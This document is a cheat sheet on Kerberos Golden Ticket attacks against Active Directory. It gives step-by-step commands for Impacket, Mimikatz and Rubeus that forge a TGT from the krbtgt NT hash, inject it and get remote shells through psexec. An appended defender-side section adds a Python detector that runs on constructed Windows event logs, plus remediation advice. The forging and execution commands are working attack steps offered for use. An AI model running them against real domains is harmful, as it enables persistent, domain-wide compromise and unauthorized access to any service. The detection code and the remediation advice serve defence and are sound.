Golden Tickets
A Golden Ticket is a Ticket Granting Ticket (TGT) forged with the key of the krbtgt domain account, the service account of the Key Distribution Center (KDC). Because the KDC validates a TGT simply by decrypting it with the krbtgt key, a forged one is accepted as genuine and can be used to obtain a Service Ticket for any service in the domain.
The krbtgt account's password, in practice its NT hash, is therefore required to build the TGT/Golden Ticket. It is usually obtained through a DCSync attack once domain administrator (or equivalent) privileges have been gained.
Exploit

Impacket (Linux)

## Create a Golden Ticket Using the NT Hash of the krbtgt Account
ticketer.py -nthash [krbtgt nt hash] -domain-sid [domain sid] -domain [domain] krbtgt
## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]
## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/krbtgt@[computer] -k -no-pass

Mimikatz (Windows)

## Run Mimikatz.exe
Mimikatz.exe
## Create Golden Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[krbtgt nt hash] /user:weelee /ptt
## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd

Rubeus (Windows)

## Create A Golden Ticket And Inject It Into The Current Process
Rubeus.exe golden /rc4:[nt hash] /user:weelee /ldap /ptt
## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd
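Added here as a defender-side example, not part of the original page: all three tool variants above leave the same footprint on the domain controller, a service-ticket request (event 4769) whose TGT the KDC never issued (so no matching 4768 from that host), often for the krbtgt account itself (the Impacket variant) and RC4-encrypted (the /rc4 and -nthash inputs). The events, hosts, times and simplified field names below are constructed for this example.

```python
from collections import defaultdict

# Constructed sample of Windows Security events, reduced to the EventData
# fields the checks need: 4768 = TGT requested, 4769 = service ticket requested.
# "user" is TargetUserName, "etype" is TicketEncryptionType, "ip" is IpAddress.
SAMPLE_EVENTS = [
    {"id": 4768, "time": 100, "user": "alice", "ip": "10.0.0.5", "etype": "0x12"},
    {"id": 4769, "time": 130, "user": "alice@WEELEE.ZIP", "ip": "10.0.0.5",
     "etype": "0x12", "service": "cifs/fs01"},
    # Forged TGT in use: ticket requested as krbtgt, RC4, and no 4768 from this host.
    {"id": 4769, "time": 200, "user": "krbtgt@WEELEE.ZIP", "ip": "10.0.0.99",
     "etype": "0x17", "service": "cifs/computer"},
    {"id": 4769, "time": 210, "user": "weelee@WEELEE.ZIP", "ip": "10.0.0.99",
     "etype": "0x17", "service": "cifs/computer"},
]

RC4_HMAC = "0x17"  # encryption type of tickets built from an NT hash (/rc4, -nthash)


def find_golden_ticket_indicators(events, tgt_window=36000):
    """Return (account, ip, reasons) for each 4769 that looks like a forged TGT.

    tgt_window is the maximum age, in seconds, of a legitimate 4768 that can
    explain a later 4769 from the same host (default 10h, the usual TGT lifetime).
    Each indicator alone is noisy (legacy RC4 hosts, log gaps, renewals);
    the krbtgt account name or two or more reasons together is worth triage.
    """
    tgt_seen = defaultdict(list)  # ip -> times at which the KDC really issued a TGT
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4768:
            tgt_seen[ev["ip"]].append(ev["time"])
            continue
        if ev["id"] != 4769:
            continue
        reasons = []
        account = ev["user"].split("@", 1)[0].lower()
        if account == "krbtgt":
            reasons.append("service ticket requested as krbtgt")
        if ev["etype"] == RC4_HMAC:
            reasons.append("RC4 ticket in an AES domain")
        if not any(0 <= ev["time"] - t <= tgt_window for t in tgt_seen[ev["ip"]]):
            reasons.append("no 4768 TGT request from this host")
        if reasons:
            findings.append((account, ev["ip"], reasons))
    return findings


if __name__ == "__main__":
    for account, ip, reasons in find_golden_ticket_indicators(SAMPLE_EVENTS):
        print(f"{ip} {account}: {', '.join(reasons)}")
```

Once a forged TGT is suspected, the only reliable remediation is resetting the krbtgt password twice (with a replication interval in between), which invalidates every ticket built from the old hash.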